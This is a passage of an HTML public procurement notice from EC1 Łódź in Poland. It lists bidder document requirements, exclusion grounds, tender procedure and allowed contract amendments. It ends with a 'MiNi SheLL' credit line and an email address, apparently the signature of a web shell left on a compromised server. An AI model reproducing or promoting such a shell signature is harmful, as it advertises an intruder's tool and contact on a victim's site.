Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie oświadczeń i dokumentów jakie Wykonawca załączy do oferty metodą spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty wystawione przez Zamawiających poświadczające opracowanie wskazanych dokumentacji projketowych oraz potwierdzające należyte wykonanie usług wykazanych przez wykonawców.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,  niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
2.Przed podisaniem umowy Zamawijący żądać będzie wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5 procent ceny oferowanej brutto, które musi być wniesione najpóźniej w dniu podpisania umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Na podstawie art. 144 ust. 1 ustawy PZP Zamawiający przewiduje możliwość dokonania zmian w zawartej umowie w następujących sytuacjach

a zmiany stawki podatku VAT
b zmiany organizacyjnej Zamawiającego istotnej dla realizacji niniejszej umowy
c zmiany formy prawnej prowadzonej działalności gospodarczej stron umowy
d zmiany adresu siedziby stron umowy i zmiany adresu zamieszkania właściciela lub współwłaściciela firmy Wykonawcy
e zmiany terminu płatności
f zmiany terminu wykonania przedmiotu umowy oraz w szczególności terminów wykonania poszczególnych obowiązków, określonych 
w załączniku nr 2 do umowy harmonogram, w sytuacji gdy zmiana ta wynika z okoliczności niezależnych od Wykonawcy, wynika z wydłużenia realizacji umów zawartych w wykonawcami robót, dostaw i usług lub okoliczności, których nie można było przewidzieć w chwili zawarcia umowy
g zmiany terminu i sposobu zapłaty wynagrodzenia w sytuacji zmiany zasad finansowania zamówienia przez Zamawiającego, zmiany terminu wykonania zamówienia, zmiany przepisów prawa, zmniejszenia przez strony zakresu wykonywanego zamówienia.
h w przypadku o którym mowa w par.6 ust. 6 umowy, strony przewidują możliwość zmiany umowy w zakresie podwyższenia wynagrodzenia określonego w par. 4 ust. 1 umowy o kwotę nie wyższą niż 5 procent całkowitego wynagrodzenia podstawowego, tj. o kwotę    PLN. W takim wypadku przed dokonaniem zmiany umowy strony dokonają oszacowania nakładu pracy wykonawcy w związku z zakresem koniecznych aktualizacji i na tej podstawie określą wysokość kwoty o jaką ulegnie zwiększenie wynagrodzenia należnego z tego tytułu Wykonawcy, jednakże nie więcej niż wskazana kwota    PLN. 
i zmiany korzystnej dla Zamawiającego. 

2.	Warunkiem dokonania zmiany, o której mowa w ust. 1 pkt. a, b i c, d, e, g i h jest wystąpienie okoliczności tam wskazanych. Zmiany przewidziane w pkt. f mogą być wprowadzone w przypadku, gdy potrzeba ich dokonania wynika z okoliczności niezawinionych przez Wykonawcę. Warunkiem skutecznego dokonania zmiany umowy jest podpisanie przez strony stosownego aneksu do niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ec1lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytucja Kultury EC1 Łódź-Miasto Kultury
ul. Tymienieckiego 5 90-365 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.07.2012 godzina 10:00, miejsce: Instytucja Kultury EC1 Łódź-Miasto Kultury
ul. Tymienieckiego 5 90-365 Łódź pokój nr 220.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest realizowane w ramach projektu pn. Rewitalizacja EC-1 i jej adaptacja na cele kulturalno artystyczne, w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com